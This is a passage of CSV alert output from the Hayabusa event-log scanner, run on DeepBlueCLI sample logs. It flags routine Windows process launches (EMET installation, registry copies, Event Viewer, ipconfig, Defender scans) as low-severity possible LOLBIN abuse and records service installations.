C:\Windows\System32\sc.exe | PID: 0x710 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-02 05:48:22.723 +09:00,IE10Win7,7045,info,Persis,Service Installed,Name: ASP.NET State Service | Path: %SystemRoot%\Microsoft.NET\Framework\v4.0.30319\aspnet_state.exe | Account: LocalSystem | Start Type: disabled,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-09-02 05:49:59.321 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x128c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-02 05:50:05.366 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\System32\msiexec.exe"" /i ""C:\Users\IEUser\Downloads\EMET Setup (1).msi"" | Path: C:\Windows\System32\msiexec.exe | PID: 0x17e4 | User: IEUser | LID: 0x4d011",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-02 05:50:05.541 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0x1570 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-02 05:50:19.219 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\MsiExec.exe -Embedding 4DE932ADC1206E85CE03A5855ECF29FC | Path: C:\Windows\System32\msiexec.exe | PID: 0x434 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-02 05:50:19.686 +09:00,IE10Win7,7045,info,Persis,Service Installed,"Name: Microsoft EMET Service | Path: ""C:\Program Files\EMET 5.5\EMET_Service.exe"" | Account: LocalSystem | Start Type: auto start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-09-02 05:50:19.909 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\MsiExec.exe -Embedding 22F8D0F1805E128ED9C40EA3A4181C89 E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0xe78 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-02 05:50:20.040 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\System32\reg.exe"" copy hklm\software\microsoft\emet_up hklm\software\microsoft\emet /s /f | Path: C:\Windows\System32\reg.exe | PID: 0x59c | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-02 05:50:20.058 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""regsvr32.exe"" /s ""C:\Program Files\EMET 5.5\EMET_CE.DLL"" | Path: C:\Windows\System32\regsvr32.exe | PID: 0x17d4 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-02 05:50:20.147 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\System32\reg.exe"" delete hklm\software\microsoft\emet_up /f | Path: C:\Windows\System32\reg.exe | PID: 0x13d4 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-02 05:50:20.214 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\System32\reg.exe"" copy hklm\software\policies\microsoft\emet_up hklm\software\policies\microsoft\emet /s /f | Path: C:\Windows\System32\reg.exe | PID: 0x17c0 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-02 05:50:20.258 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\System32\reg.exe"" delete hklm\software\policies\microsoft\emet_up /f | Path: C:\Windows\System32\reg.exe | PID: 0x14cc | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-02 05:53:20.687 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\511-evtx\Win7-application.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0x1598 | User: IEUser | LID: 0x4d011",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-02 05:53:20.767 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xa1c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-02 05:53:20.804 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x364 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-02 05:53:20.815 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\511-evtx\Win7-application.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0xf94 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-02 05:53:20.853 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\511-evtx\Win7-application.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0x1628 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-02 06:24:37.363 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x16d4 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-02 06:24:37.378 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0x148c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-02 23:08:33.005 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x4a8 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-02 23:08:33.233 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x398 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-02 23:08:33.396 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x175c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-02 23:08:53.121 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x1360 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-02 23:10:30.765 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\wuauclt.exe"" /RunHandlerComServer | Path: C:\Windows\System32\wuauclt.exe | PID: 0x103c | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-02 23:46:22.988 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0x1780 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-02 23:46:23.139 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan -Reinvoke | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0x100 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-02 23:46:23.201 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" SignaturesUpdateService -ScheduleJob | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0x6f8 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-02 23:48:22.957 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe aepdu.dll,AePduRunUpdate | Path: C:\Windows\System32\rundll32.exe | PID: 0x8d0 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-03 00:00:00.476 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0x1698 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-03 00:04:56.561 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\findstr.exe"" xml | Path: C:\Windows\System32\findstr.exe | PID: 0x16ac | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-03 00:05:21.063 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\findstr.exe"" xml | Path: C:\Windows\System32\findstr.exe | PID: 0x994 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-03 00:12:14.714 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" .\511-evtx\511-5-system.evtx | Path: C:\Windows\System32\eventvwr.exe | PID: 0x13a0 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-03 00:12:14.738 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /COMPUTER:.\511-evtx\511-5-system.evtx | Path: C:\Windows\System32\mmc.exe | PID: 0x10f4 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-03 00:12:39.238 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x6f8 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-03 00:12:39.356 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\511-evtx\511-5-system.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0xcb4 | User: IEUser | LID: 0x4d011",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-03 00:12:39.409 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x14c0 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-03 00:12:39.433 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x62c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-03 00:12:39.445 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\511-evtx\511-5-system.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0x1294 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-03 00:12:39.484 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\511-evtx\511-5-system.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0xe34 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-03 00:14:02.255 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" .\511-evtx\511-5-system.evtx | Path: C:\Windows\System32\eventvwr.exe | PID: 0xe28 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-03 00:14:02.270 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /COMPUTER:.\511-evtx\511-5-system.evtx | Path: C:\Windows\System32\mmc.exe | PID: 0x3c4 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-03 00:53:11.002 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: sc.exe start sppsvc | Path: C:\Windows\System32\sc.exe | PID: 0x6f0 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-03 01:40:58.690 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xc4c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-03 01:41:25.835 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x298 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-03 03:18:00.297 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\511-evtx\powershell5.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0xcac | User: IEUser | LID: 0x4d011",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-03 03:18:00.345 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x1084 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-03 03:18:00.364 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x3b4 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-03 03:18:00.383 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\511-evtx\powershell5.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0x5a0 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-03 03:18:00.420 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\511-evtx\powershell5.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0x11f4 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-03 04:22:52.366 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x14dc | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-03 04:25:19.159 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x140 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-03 04:25:27.075 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x13d0 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-03 06:16:47.905 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x13a8 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-03 06:24:11.171 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x15a8 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-03 06:24:11.188 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0x1128 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-03 23:42:26.898 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\wuauclt.exe"" /RunHandlerComServer | Path: C:\Windows\System32\wuauclt.exe | PID: 0x1570 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-03 23:42:26.947 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x568 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-03 23:42:27.427 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0xc00 | User: IE10WIN7$ | LID: 